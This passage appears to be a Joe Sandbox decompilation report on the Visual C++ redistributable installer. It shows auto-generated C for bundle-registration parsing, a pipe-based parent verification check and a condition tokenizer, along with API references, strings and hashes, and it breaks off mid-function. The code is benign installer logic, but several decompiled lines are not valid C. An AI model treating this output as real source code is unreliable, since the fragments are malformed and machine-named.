                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocateCreateErrorEventLastMutexProcessRelease
                                                                          • String ID: %ls_mutex$%ls_send$@Met$Failed to MapViewOfFile for %ls.$Failed to allocate memory for NetFxChainer struct.$Failed to create event: %ls$Failed to create mutex: %ls$Failed to memory map cabinet file: %ls$NetFxChainer.cpp$failed to allocate memory for event name$failed to allocate memory for mutex name$failed to copy event name to shared memory structure.
                                                                          • API String ID: 3944734951-3002565421
                                                                          • Opcode ID: 9f5ff471ab93dbdc1b16342f564f8c8e932fc48aa54357528d8522a578b76284
                                                                          • Instruction ID: 2052250b4cc57358e8ddfb5f45de559a70e4011890a2fe141337ea6411ae9e8e
                                                                          • Opcode Fuzzy Hash: 9f5ff471ab93dbdc1b16342f564f8c8e932fc48aa54357528d8522a578b76284
                                                                          • Instruction Fuzzy Hash: BB71B472A41711BBE7229B658C49F9B7AE8EF04350F018225FD08EB291D7789D5087E9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 75%
                                                                          			E0001E936(void* __edi, intOrPtr _a4, int _a8) {
                                                                          				signed int _v8;
                                                                          				int _v12;
                                                                          				void* _v16;
                                                                          				void* _v20;
                                                                          				char _v24;
                                                                          				intOrPtr* _t82;
                                                                          				intOrPtr _t108;
                                                                          				intOrPtr* _t125;
                                                                          				intOrPtr* _t126;
                                                                          				intOrPtr _t141;
                                                                          				void* _t143;
                                                                          
                                                                          				_v16 = 0;
                                                                          				_v20 = 0;
                                                                          				_v12 = 0;
                                                                          				_v8 = 0;
                                                                          				_v24 = 0;
                                                                          				_t143 = E00053803(_a8, L"RelatedBundle",  &_v16);
                                                                          				if(_t143 >= 0) {
                                                                          					_t82 = _v16;
                                                                          					_t124 =  *_t82;
                                                                          					_t143 =  *((intOrPtr*)( *_t82 + 0x20))(_t82,  &_v24);
                                                                          					if(_t143 >= 0) {
                                                                          						_a8 = 0;
                                                                          						if(_v24 > 0) {
                                                                          							_t141 = _a4;
                                                                          							while(1) {
                                                                          								_t143 = E00053760(_t124, _v16,  &_v20, 0);
                                                                          								if(_t143 < 0) {
                                                                          									break;
                                                                          								}
                                                                          								_t143 = E000531C7(_v20, L"Action",  &_v12);
                                                                          								if(_t143 < 0) {
                                                                          									_push("Failed to get @Action.");
                                                                          									goto L32;
                                                                          								} else {
                                                                          									_t143 = E000531C7(_v20, L"Id",  &_v8);
                                                                          									if(_t143 < 0) {
                                                                          										_push("Failed to get @Id.");
                                                                          										goto L32;
                                                                          									} else {
                                                                          										if(CompareStringW(0x7f, 0, _v12, 0xffffffff, L"Detect", 0xffffffff) != 2) {
                                                                          											if(CompareStringW(0x7f, 0, _v12, 0xffffffff, L"Upgrade", 0xffffffff) != 2) {
                                                                          												if(CompareStringW(0x7f, 0, _v12, 0xffffffff, L"Addon", 0xffffffff) != 2) {
                                                                          													if(CompareStringW(0x7f, 0, _v12, 0xffffffff, L"Patch", 0xffffffff) != 2) {
                                                                          														_t143 = 0x80070057;
                                                                          														E0005012F(0x80070057, "Invalid value for @Action: %ls", _v12);
                                                                          													} else {
                                                                          														_t143 = E000138F6( *(_t141 + 0x34) + 1, _t141 + 0x30, _t141 + 0x30,  *(_t141 + 0x34) + 1, 4, 5);
                                                                          														if(_t143 < 0) {
                                                                          															_push("Failed to resize Patch code array in registration");
                                                                          															goto L32;
                                                                          														} else {
                                                                          															_t124 =  *((intOrPtr*)(_t141 + 0x30));
                                                                          															 *((intOrPtr*)( *((intOrPtr*)(_t141 + 0x30)) +  *(_t141 + 0x34) * 4)) = _v8;
                                                                          															_v8 = _v8 & 0x00000000;
                                                                          															 *(_t141 + 0x34) =  *(_t141 + 0x34) + 1;
                                                                          															goto L22;
                                                                          														}
                                                                          													}
                                                                          												} else {
                                                                          													_t143 = E000138F6( *(_t141 + 0x2c) + 1, _t141 + 0x28, _t141 + 0x28,  *(_t141 + 0x2c) + 1, 4, 5);
                                                                          													if(_t143 < 0) {
                                                                          														_push("Failed to resize Addon code array in registration");
                                                                          														goto L32;
                                                                          													} else {
                                                                          														_t124 =  *((intOrPtr*)(_t141 + 0x28));
                                                                          														 *((intOrPtr*)( *((intOrPtr*)(_t141 + 0x28)) +  *(_t141 + 0x2c) * 4)) = _v8;
                                                                          														_v8 = _v8 & 0x00000000;
                                                                          														 *(_t141 + 0x2c) =  *(_t141 + 0x2c) + 1;
                                                                          														goto L22;
                                                                          													}
                                                                          												}
                                                                          											} else {
                                                                          												_t143 = E000138F6( *(_t141 + 0x24) + 1, _t141 + 0x20, _t141 + 0x20,  *(_t141 + 0x24) + 1, 4, 5);
                                                                          												if(_t143 < 0) {
                                                                          													_push("Failed to resize Upgrade code array in registration");
                                                                          													goto L32;
                                                                          												} else {
                                                                          													_t124 =  *((intOrPtr*)(_t141 + 0x20));
                                                                          													 *((intOrPtr*)( *((intOrPtr*)(_t141 + 0x20)) +  *(_t141 + 0x24) * 4)) = _v8;
                                                                          													_v8 = _v8 & 0x00000000;
                                                                          													 *(_t141 + 0x24) =  *(_t141 + 0x24) + 1;
                                                                          													goto L22;
                                                                          												}
                                                                          											}
                                                                          										} else {
                                                                          											_t143 = E000138F6( *(_t141 + 0x1c) + 1, _t141 + 0x18, _t141 + 0x18,  *(_t141 + 0x1c) + 1, 4, 5);
                                                                          											if(_t143 < 0) {
                                                                          												_push("Failed to resize Detect code array in registration");
                                                                          												L32:
                                                                          												_push(_t143);
                                                                          												E0005012F();
                                                                          											} else {
                                                                          												_t124 =  *((intOrPtr*)(_t141 + 0x18));
                                                                          												 *((intOrPtr*)( *((intOrPtr*)(_t141 + 0x18)) +  *(_t141 + 0x1c) * 4)) = _v8;
                                                                          												_v8 = _v8 & 0x00000000;
                                                                          												 *(_t141 + 0x1c) =  *(_t141 + 0x1c) + 1;
                                                                          												L22:
                                                                          												_t108 = _a8 + 1;
                                                                          												_a8 = _t108;
                                                                          												if(_t108 < _v24) {
                                                                          													continue;
                                                                          												} else {
                                                                          												}
                                                                          											}
                                                                          										}
                                                                          									}
                                                                          								}
                                                                          								goto L34;
                                                                          							}
                                                                          							_push("Failed to get next RelatedBundle element.");
                                                                          							goto L32;
                                                                          						}
                                                                          					} else {
                                                                          						_push("Failed to get RelatedBundle element count.");
                                                                          						goto L2;
                                                                          					}
                                                                          				} else {
                                                                          					_push("Failed to get RelatedBundle nodes");
                                                                          					L2:
                                                                          					_push(_t143);
                                                                          					E0005012F();
                                                                          				}
                                                                          				L34:
                                                                          				_t125 = _v16;
                                                                          				if(_t125 != 0) {
                                                                          					 *((intOrPtr*)( *_t125 + 8))(_t125);
                                                                          				}
                                                                          				_t126 = _v20;
                                                                          				if(_t126 != 0) {
                                                                          					 *((intOrPtr*)( *_t126 + 8))(_t126);
                                                                          				}
                                                                          				if(_v12 != 0) {
                                                                          					E000554EF(_v12);
                                                                          				}
                                                                          				if(_v8 != 0) {
                                                                          					E000554EF(_v8);
                                                                          				}
                                                                          				return _t143;
                                                                          			}

                                                                          APIs
                                                                            • Part of subcall function 000531C7: VariantInit.OLEAUT32(?), ref: 000531DD
                                                                            • Part of subcall function 000531C7: SysAllocString.OLEAUT32(?), ref: 000531F9
                                                                            • Part of subcall function 000531C7: VariantClear.OLEAUT32(?), ref: 00053280
                                                                            • Part of subcall function 000531C7: SysFreeString.OLEAUT32(00000000), ref: 0005328B
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,000000FF,000000FF,Detect,000000FF,?,0005CA64,?,?,Action,?,?,?,00000000,0001533D), ref: 0001EA07
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,Upgrade,000000FF), ref: 0001EA51
                                                                          Strings
                                                                          • comres.dll, xrefs: 0001EA1A
                                                                          • Failed to resize Patch code array in registration, xrefs: 0001EB37
                                                                          • Patch, xrefs: 0001EAD1
                                                                          • Failed to get RelatedBundle element count., xrefs: 0001E98B
                                                                          • Invalid value for @Action: %ls, xrefs: 0001EB46
                                                                          • Failed to get RelatedBundle nodes, xrefs: 0001E966
                                                                          • Addon, xrefs: 0001EA8E
                                                                          • Failed to get next RelatedBundle element., xrefs: 0001EB64
                                                                          • version.dll, xrefs: 0001EA64
                                                                          • RelatedBundle, xrefs: 0001E944
                                                                          • Failed to get @Action., xrefs: 0001EB5D
                                                                          • Upgrade, xrefs: 0001EA44
                                                                          • Action, xrefs: 0001E9C4
                                                                          • Failed to resize Addon code array in registration, xrefs: 0001EB30
                                                                          • Failed to get @Id., xrefs: 0001EB56
                                                                          • Failed to resize Detect code array in registration, xrefs: 0001EB22
                                                                          • cabinet.dll, xrefs: 0001EAAE
                                                                          • Failed to resize Upgrade code array in registration, xrefs: 0001EB29
                                                                          • Detect, xrefs: 0001E9F8
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: String$CompareVariant$AllocClearFreeInit
                                                                          • String ID: Action$Addon$Detect$Failed to get @Action.$Failed to get @Id.$Failed to get RelatedBundle element count.$Failed to get RelatedBundle nodes$Failed to get next RelatedBundle element.$Failed to resize Addon code array in registration$Failed to resize Detect code array in registration$Failed to resize Patch code array in registration$Failed to resize Upgrade code array in registration$Invalid value for @Action: %ls$Patch$RelatedBundle$Upgrade$cabinet.dll$comres.dll$version.dll
                                                                          • API String ID: 702752599-259800149
                                                                          • Opcode ID: 4b353794735de727d83910261e6e1c0f0b12d5e52d285c0ead866c7115eaef07
                                                                          • Instruction ID: 0d9b96727cad031dfa078fdd011c22f52c022805f09a239b1680aa70d3fdf6a3
                                                                          • Opcode Fuzzy Hash: 4b353794735de727d83910261e6e1c0f0b12d5e52d285c0ead866c7115eaef07
                                                                          • Instruction Fuzzy Hash: CE71A034A48666BBDB10CB54CC81EEEB7B5FF04725F244254ED12AB6C1D731AE90CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 72%
                                                                          			E000244E7(void* _a4, short* _a8, intOrPtr* _a12) {
                                                                          				struct _OVERLAPPED* _v8;
                                                                          				void _v12;
                                                                          				long _v16;
                                                                          				void _v20;
                                                                          				long _v24;
                                                                          				void _v28;
                                                                          				long _t26;
                                                                          				intOrPtr _t41;
                                                                          				intOrPtr* _t66;
                                                                          				void* _t69;
                                                                          				void* _t70;
                                                                          				void* _t71;
                                                                          
                                                                          				_v8 = 0;
                                                                          				_v12 = 0;
                                                                          				_v20 = 0;
                                                                          				_v16 = 0;
                                                                          				_t26 = GetCurrentProcessId();
                                                                          				_t69 = _a4;
                                                                          				_v28 = _t26;
                                                                          				_v24 = 0;
                                                                          				if(ReadFile(_t69,  &_v12, 4,  &_v16, 0) != 0) {
                                                                          					_t31 = _v12 >> 1;
                                                                          					if(_v12 >> 1 <= 0xff) {
                                                                          						_t71 = E00011EDE( &_v8, _t31 + 1);
                                                                          						if(_t71 >= 0) {
                                                                          							if(ReadFile(_t69, _v8, _v12,  &_v16, 0) != 0) {
                                                                          								if(CompareStringW(0, 0, _v8, 0xffffffff, _a8, 0xffffffff) == 2) {
                                                                          									if(ReadFile(_t69,  &_v20, 4,  &_v16, 0) != 0) {
                                                                          										_t66 = _a12;
                                                                          										_t41 =  *_t66;
                                                                          										if(_t41 != 0) {
                                                                          											if(_t41 == _v20) {
                                                                          												goto L15;
                                                                          											} else {
                                                                          												_t70 = 0x8007000d;
                                                                          												_t71 = 0x8007000d;
                                                                          												E000137D3(_t41, "pipe.cpp", 0x36d, 0x8007000d);
                                                                          												_push("Verification process id from parent does not match.");
                                                                          												goto L4;
                                                                          											}
                                                                          										} else {
                                                                          											 *_t66 = _v20;
                                                                          											L15:
                                                                          											if(WriteFile(_t69,  &_v28, 4,  &_v24, 0) == 0) {
                                                                          												_t74 =  <=  ? GetLastError() : _t47 & 0x0000ffff | 0x80070000;
                                                                          												_t71 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t47 & 0x0000ffff | 0x80070000;
                                                                          												E000137D3(0x80004005, "pipe.cpp", 0x373, _t71);
                                                                          												_push("Failed to inform parent process that child is running.");
                                                                          												goto L17;
                                                                          											}
                                                                          										}
                                                                          									} else {
                                                                          										_t77 =  <=  ? GetLastError() : _t53 & 0x0000ffff | 0x80070000;
                                                                          										_t71 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t53 & 0x0000ffff | 0x80070000;
                                                                          										E000137D3(0x80004005, "pipe.cpp", 0x362, _t71);
                                                                          										_push("Failed to read verification process id from parent pipe.");
                                                                          										goto L17;
                                                                          									}
                                                                          								} else {
                                                                          									_t70 = 0x8007000d;
                                                                          									_t71 = 0x8007000d;
                                                                          									E000137D3(_t37, "pipe.cpp", 0x35c, 0x8007000d);
                                                                          									_push("Verification secret from parent does not match.");
                                                                          									goto L4;
                                                                          								}
                                                                          							} else {
                                                                          								_t80 =  <=  ? GetLastError() : _t57 & 0x0000ffff | 0x80070000;
                                                                          								_t71 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t57 & 0x0000ffff | 0x80070000;
                                                                          								E000137D3(0x80004005, "pipe.cpp", 0x355, _t71);
                                                                          								_push("Failed to read verification secret from parent pipe.");
                                                                          								goto L17;
                                                                          							}
                                                                          						} else {
                                                                          							_push("Failed to allocate buffer for verification secret.");
                                                                          							goto L17;
                                                                          						}
                                                                          					} else {
                                                                          						_t70 = 0x8007000d;
                                                                          						_t71 = 0x8007000d;
                                                                          						E000137D3(_t31, "pipe.cpp", 0x34d, 0x8007000d);
                                                                          						_push("Verification secret from parent is too big.");
                                                                          						L4:
                                                                          						_push(_t70);
                                                                          						goto L18;
                                                                          					}
                                                                          				} else {
                                                                          					_t83 =  <=  ? GetLastError() : _t61 & 0x0000ffff | 0x80070000;
                                                                          					_t71 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t61 & 0x0000ffff | 0x80070000;
                                                                          					E000137D3(0x80004005, "pipe.cpp", 0x347, _t71);
                                                                          					_push("Failed to read size of verification secret from parent pipe.");
                                                                          					L17:
                                                                          					_push(_t71);
                                                                          					L18:
                                                                          					E0005012F();
                                                                          				}
                                                                          				if(_v8 != 0) {
                                                                          					E000554EF(_v8);
                                                                          				}
                                                                          				return _t71;
                                                                          			}
















                                                                          APIs
                                                                          • GetCurrentProcessId.KERNEL32(?,8000FFFF,feclient.dll,?,000249FE,0005B4D8,?,feclient.dll,00000000,?,?), ref: 000244FE
                                                                          • ReadFile.KERNEL32(feclient.dll,feclient.dll,00000004,?,00000000,?,000249FE,0005B4D8,?,feclient.dll,00000000,?,?), ref: 0002451F
                                                                          • GetLastError.KERNEL32(?,000249FE,0005B4D8,?,feclient.dll,00000000,?,?), ref: 00024525
                                                                          • WriteFile.KERNEL32(feclient.dll,?,00000004,000249FE,00000000,?,000249FE,0005B4D8,?,feclient.dll,00000000,?,?), ref: 0002468E
                                                                          • GetLastError.KERNEL32(?,000249FE,0005B4D8,?,feclient.dll,00000000,?,?), ref: 00024698
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLast$CurrentProcessReadWrite
                                                                          • String ID: @Met$Failed to allocate buffer for verification secret.$Failed to inform parent process that child is running.$Failed to read size of verification secret from parent pipe.$Failed to read verification process id from parent pipe.$Failed to read verification secret from parent pipe.$Verification process id from parent does not match.$Verification secret from parent does not match.$Verification secret from parent is too big.$feclient.dll$msasn1.dll$pipe.cpp
                                                                          • API String ID: 3008747291-3169506970
                                                                          • Opcode ID: 67d83f21934d2cbe85b5b4c30c3e9623570ffe360ce5c2d56f8dd44b1f5f618a
                                                                          • Instruction ID: d3dd1b99ea26004ff27bf92d5c27e589e6d127e1d1beaab67aebd8a07089f813
                                                                          • Opcode Fuzzy Hash: 67d83f21934d2cbe85b5b4c30c3e9623570ffe360ce5c2d56f8dd44b1f5f618a
                                                                          • Instruction Fuzzy Hash: AB51C272A40725BBE7219AA59C85FBFB6EDAB05B10F114126FE01EB190D7748E0086E6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 71%
                                                                          			E00018E48(int _a4) {
                                                                          				short _v8;
                                                                          				signed int _v12;
                                                                          				int _v16;
                                                                          				char _v20;
                                                                          				signed int _t127;
                                                                          				void* _t128;
                                                                          				void* _t132;
                                                                          				void* _t134;
                                                                          				void* _t135;
                                                                          				void* _t139;
                                                                          				void* _t141;
                                                                          				void* _t142;
                                                                          				void* _t144;
                                                                          				void* _t147;
                                                                          				void* _t148;
                                                                          				int _t155;
                                                                          				int _t161;
                                                                          				void* _t166;
                                                                          				short* _t175;
                                                                          				int _t179;
                                                                          				short* _t181;
                                                                          				void* _t194;
                                                                          				void* _t195;
                                                                          				signed int _t197;
                                                                          				void* _t198;
                                                                          				signed int _t199;
                                                                          				void* _t204;
                                                                          				int _t209;
                                                                          				signed int _t210;
                                                                          				signed short* _t213;
                                                                          				int _t214;
                                                                          				void* _t217;
                                                                          				void _t219;
                                                                          				void* _t220;
                                                                          				void* _t223;
                                                                          				int _t229;
                                                                          				void* _t231;
                                                                          				void* _t232;
                                                                          				void* _t234;
                                                                          				void* _t236;
                                                                          				int _t237;
                                                                          				int _t238;
                                                                          				void* _t246;
                                                                          
                                                                          				_t209 = _a4;
                                                                          				_v8 = 0;
                                                                          				_t237 = 0;
                                                                          				_t3 = _t209 + 0x18; // 0x19801
                                                                          				E00030499(_t3);
                                                                          				_t4 = _t209 + 0x10; // 0x197f9
                                                                          				_t223 = _t4;
                                                                          				_v16 = 2;
                                                                          				_t210 = 8;
                                                                          				memset(_t223, 0, _t210 << 2);
                                                                          				_t7 = _t209 + 8; // 0x560005db
                                                                          				if(0 !=  *((intOrPtr*)( *_t7))) {
                                                                          					while(1) {
                                                                          						_t9 = _t209 + 8; // 0x560005db
                                                                          						GetStringTypeW(1,  *_t9, 1,  &_v8);
                                                                          						if((_v8 & 0x00000040) == 0) {
                                                                          							break;
                                                                          						}
                                                                          						 *(_t209 + 8) =  &(( *(_t209 + 8))[1]);
                                                                          						_t15 = _t209 + 8; // 0x560005db
                                                                          						if(0 !=  *((intOrPtr*)( *_t15))) {
                                                                          							continue;
                                                                          						}
                                                                          						break;
                                                                          					}
                                                                          					_t16 = _t209 + 0x10; // 0x197f9
                                                                          					_t223 = _t16;
                                                                          				}
                                                                          				_t17 = _t209 + 8; // 0x560005db
                                                                          				_t213 =  *_t17;
                                                                          				_t18 = _t209 + 4; // 0x70680f79
                                                                          				_v12 = _t213 -  *_t18 >> 1;
                                                                          				_t127 =  *_t213 & 0x0000ffff;
                                                                          				_t246 = _t127 - 0x3c;
                                                                          				if(_t246 > 0) {
                                                                          					_t128 = _t127 - 0x3d;
                                                                          					if(_t128 == 0) {
                                                                          						 *_t223 = 0x10009;
                                                                          						goto L25;
                                                                          					} else {
                                                                          						_t132 = _t128 - 1;
                                                                          						if(_t132 == 0) {
                                                                          							_t134 = (_t213[1] & 0x0000ffff) - 0x3c;
                                                                          							if(_t134 == 0) {
                                                                          								 *_t223 = 0x1000b;
                                                                          								goto L98;
                                                                          							} else {
                                                                          								_t135 = _t134 - 1;
                                                                          								if(_t135 == 0) {
                                                                          									 *_t223 = 0x10008;
                                                                          									goto L98;
                                                                          								} else {
                                                                          									if(_t135 == 1) {
                                                                          										 *_t223 = 0x1000d;
                                                                          										goto L98;
                                                                          									} else {
                                                                          										 *_t223 = 0x10006;
                                                                          										goto L25;
                                                                          									}
                                                                          								}
                                                                          							}
                                                                          						} else {
                                                                          							if(_t132 == 0x40) {
                                                                          								_t139 = (_t213[1] & 0x0000ffff) - 0x3c;
                                                                          								if(_t139 == 0) {
                                                                          									_t141 = (_t213[2] & 0x0000ffff) - 0x3c;
                                                                          									if(_t141 == 0) {
                                                                          										 *_t223 = 0x3000c;
                                                                          										goto L88;
                                                                          									} else {
                                                                          										_t142 = _t141 - 1;
                                                                          										if(_t142 == 0) {
                                                                          											 *_t223 = 0x30007;
                                                                          											goto L88;
                                                                          										} else {
                                                                          											if(_t142 == 1) {
                                                                          												 *_t223 = 0x3000a;
                                                                          												goto L88;
                                                                          											} else {
                                                                          												 *_t223 = 0x30005;
                                                                          												goto L98;
                                                                          											}
                                                                          										}
                                                                          									}
                                                                          									goto L89;
                                                                          								} else {
                                                                          									_t144 = _t139 - 1;
                                                                          									if(_t144 == 0) {
                                                                          										 *_t223 = 0x30009;
                                                                          										goto L98;
                                                                          									} else {
                                                                          										_t145 = _t144 == 1;
                                                                          										if(_t144 == 1) {
                                                                          											_t147 = (_t213[2] & 0x0000ffff) - 0x3c;
                                                                          											if(_t147 == 0) {
                                                                          												 *_t223 = 0x3000b;
                                                                          												goto L88;
                                                                          											} else {
                                                                          												_t148 = _t147 - 1;
                                                                          												if(_t148 == 0) {
                                                                          													 *_t223 = 0x30008;
                                                                          													goto L88;
                                                                          												} else {
                                                                          													if(_t148 == 1) {
                                                                          														 *_t223 = 0x3000d;
                                                                          														L88:
                                                                          														_push(3);
                                                                          													} else {
                                                                          														 *_t223 = 0x30006;
                                                                          														goto L98;
                                                                          													}
                                                                          												}
                                                                          											}
                                                                          											goto L89;
                                                                          										} else {
                                                                          											_t238 = 0x8007000d;
                                                                          											 *(_t209 + 0x30) = 1;
                                                                          											_t229 = 0x8007000d;
                                                                          											E000137D3(_t145, "condition.cpp", 0x23f, 0x8007000d);
                                                                          											_push(_v12);
                                                                          											_t108 = _t209 + 4; // 0x70680f79
                                                                          											_push( *_t108);
                                                                          											_push("Failed to parse condition \"%ls\". Unexpected \'~\' operator at position %d.");
                                                                          											goto L72;
                                                                          										}
                                                                          									}
                                                                          								}
                                                                          							} else {
                                                                          								goto L33;
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          				} else {
                                                                          					if(_t246 == 0) {
                                                                          						_t194 = (_t213[1] & 0x0000ffff) - 0x3c;
                                                                          						if(_t194 == 0) {
                                                                          							 *_t223 = 0x1000c;
                                                                          							goto L98;
                                                                          						} else {
                                                                          							_t195 = _t194 - 1;
                                                                          							if(_t195 == 0) {
                                                                          								 *_t223 = 0x10007;
                                                                          								goto L98;
                                                                          							} else {
                                                                          								if(_t195 == 1) {
                                                                          									 *_t223 = 0x1000a;
                                                                          									L98:
                                                                          									_push(2);
                                                                          									L89:
                                                                          									_pop(_t237);
                                                                          								} else {
                                                                          									 *_t223 = 0x10005;
                                                                          									L25:
                                                                          									_t237 = 1;
                                                                          								}
                                                                          							}
                                                                          						}
                                                                          						_t229 = 0;
                                                                          						goto L101;
                                                                          					} else {
                                                                          						_t229 = 0;
                                                                          						_t197 = _t127;
                                                                          						if(_t197 == 0) {
                                                                          							 *_t223 = 1;
                                                                          							goto L101;
                                                                          						} else {
                                                                          							_t198 = _t197 - 0x22;
                                                                          							if(_t198 == 0) {
                                                                          								while(1) {
                                                                          									_t237 = _t237 + 1;
                                                                          									_t199 = _t213[_t237] & 0x0000ffff;
                                                                          									if(0 == _t199) {
                                                                          										break;
                                                                          									}
                                                                          									_t236 = 0x22;
                                                                          									if(_t236 != _t199) {
                                                                          										continue;
                                                                          									} else {
                                                                          										_t237 = _t237 + 1;
                                                                          										 *_t223 = 0x12;
                                                                          										_t22 = _t237 - 2; // 0x0
                                                                          										_t23 =  &(_t213[1]); // 0x560005dd
                                                                          										goto L16;
                                                                          									}
                                                                          									goto L102;
                                                                          								}
                                                                          								_t238 = 0x8007000d;
                                                                          								 *(_t209 + 0x30) = 1;
                                                                          								_t229 = 0x8007000d;
                                                                          								E000137D3(_t199, "condition.cpp", 0x27f, 0x8007000d);
                                                                          								_push(_v12);
                                                                          								_t29 = _t209 + 4; // 0x70680f79
                                                                          								_push( *_t29);
                                                                          								_push("Failed to parse condition \"%ls\". Unterminated literal at position %d.");
                                                                          								goto L72;
                                                                          							} else {
                                                                          								_t204 = _t198 - 6;
                                                                          								if(_t204 == 0) {
                                                                          									 *_t223 = 0xe;
                                                                          									goto L12;
                                                                          								} else {
                                                                          									if(_t204 != 1) {
                                                                          										L33:
                                                                          										_t224 = _v8;
                                                                          										if((_t224 & 0x00000004) != 0) {
                                                                          											L60:
                                                                          											_t231 = 0x5f;
                                                                          											while(1) {
                                                                          												_t237 = _t237 + 1;
                                                                          												_t155 = GetStringTypeW(1,  &(_t213[_t237]), 1,  &_v8);
                                                                          												if((_v8 & 0x00000100) != 0) {
                                                                          													break;
                                                                          												}
                                                                          												_t88 = _t209 + 8; // 0x560005db
                                                                          												_t213 =  *_t88;
                                                                          												if(_t231 == _t213[_t237]) {
                                                                          													break;
                                                                          												} else {
                                                                          													if((_v8 & 0x00000004) != 0) {
                                                                          														continue;
                                                                          													} else {
                                                                          														 *(_t209 + 0x10) = 0x10;
                                                                          														asm("xorps xmm0, xmm0");
                                                                          														asm("movlpd [ebp-0x10], xmm0");
                                                                          														if(E000128CD(_t213, _t237,  &_v20) >= 0) {
                                                                          															_t100 = _t209 + 0x18; // 0x19801
                                                                          															_t161 = E000302B0(_t100, _v20, _v16);
                                                                          															goto L17;
                                                                          														} else {
                                                                          															_t238 = 0x8007000d;
                                                                          															 *(_t209 + 0x30) = 1;
                                                                          															_t229 = 0x8007000d;
                                                                          															E000137D3(_t159, "condition.cpp", 0x2a1, 0x8007000d);
                                                                          															_push(_v12);
                                                                          															_t98 = _t209 + 4; // 0x70680f79
                                                                          															_push( *_t98);
                                                                          															_push("Failed to parse condition \"%ls\". Constant too big, at position %d.");
                                                                          															goto L72;
                                                                          														}
                                                                          													}
                                                                          												}
                                                                          												goto L102;
                                                                          											}
                                                                          											_t238 = 0x8007000d;
                                                                          											 *(_t209 + 0x30) = 1;
                                                                          											_t229 = 0x8007000d;
                                                                          											E000137D3(_t155, "condition.cpp", 0x294, 0x8007000d);
                                                                          											_push(_v12);
                                                                          											_t104 = _t209 + 4; // 0x70680f79
                                                                          											_push( *_t104);
                                                                          											_push("Failed to parse condition \"%ls\". Identifier cannot start at a digit, at position %d.");
                                                                          											goto L72;
                                                                          										} else {
                                                                          											_a4 = 0x2d;
                                                                          											if(_a4 == ( *_t213 & 0x0000ffff)) {
                                                                          												goto L60;
                                                                          											} else {
                                                                          												_t166 = 0x5f;
                                                                          												if((_t224 & 0x00000100) != 0) {
                                                                          													L38:
                                                                          													_t42 =  &(_t213[1]); // 0x560005dd
                                                                          													GetStringTypeW(1, _t42, 1,  &_v8);
                                                                          													_t43 = _t209 + 8; // 0x560005db
                                                                          													_t217 = 0x76;
                                                                          													if(_t217 !=  *((intOrPtr*)( *_t43)) || (_v8 & 0x00000004) == 0) {
                                                                          														_t232 = 0x5f;
                                                                          														goto L49;
                                                                          														do {
                                                                          															do {
                                                                          																L49:
                                                                          																_t237 = _t237 + 1;
                                                                          																_t67 = _t209 + 8; // 0x560005db
                                                                          																GetStringTypeW(1,  *_t67 + _t237 + _t237, 1,  &_v8);
                                                                          															} while ((_v8 & 0x00000104) != 0);
                                                                          															_t72 = _t209 + 8; // 0x560005db
                                                                          															_t175 =  *_t72;
                                                                          														} while (_t232 == _t175[_t237]);
                                                                          														_t229 = 0;
                                                                          														if(_t237 != 2) {
                                                                          															if(_t237 != 3) {
                                                                          																goto L59;
                                                                          															} else {
                                                                          																if(CompareStringW(0x7f, 1, _t175, _t237, L"AND", _t237) != 2) {
                                                                          																	_t78 = _t209 + 8; // 0x560005db
                                                                          																	if(CompareStringW(0x7f, 1,  *_t78, 3, L"NOT", 3) != 2) {
                                                                          																		goto L59;
                                                                          																	} else {
                                                                          																		 *(_t209 + 0x10) = 4;
                                                                          																		goto L101;
                                                                          																	}
                                                                          																} else {
                                                                          																	 *(_t209 + 0x10) = _t237;
                                                                          																	goto L101;
                                                                          																}
                                                                          															}
                                                                          														} else {
                                                                          															_t179 = CompareStringW(0x7f, 1, _t175, 2, L"OR", 2);
                                                                          															_t219 = _v16;
                                                                          															if(_t179 != _t219) {
                                                                          																L59:
                                                                          																_push(_t237);
                                                                          																_t80 = _t209 + 8; // 0x560005db
                                                                          																_push( *_t80);
                                                                          																 *(_t209 + 0x10) = 0x11;
                                                                          																L16:
                                                                          																_t24 = _t209 + 0x18; // 0x19801
                                                                          																_t161 = E000302F4();
                                                                          																L17:
                                                                          																_t214 = _t161;
                                                                          																_a4 = _t214;
                                                                          																if(_t214 >= 0) {
                                                                          																	_t229 = _a4;
                                                                          																	goto L101;
                                                                          																} else {
                                                                          																	_push("Failed to set symbol value.");
                                                                          																	_push(_t214);
                                                                          																	E0005012F();
                                                                          																	_t229 = _a4;
                                                                          																}
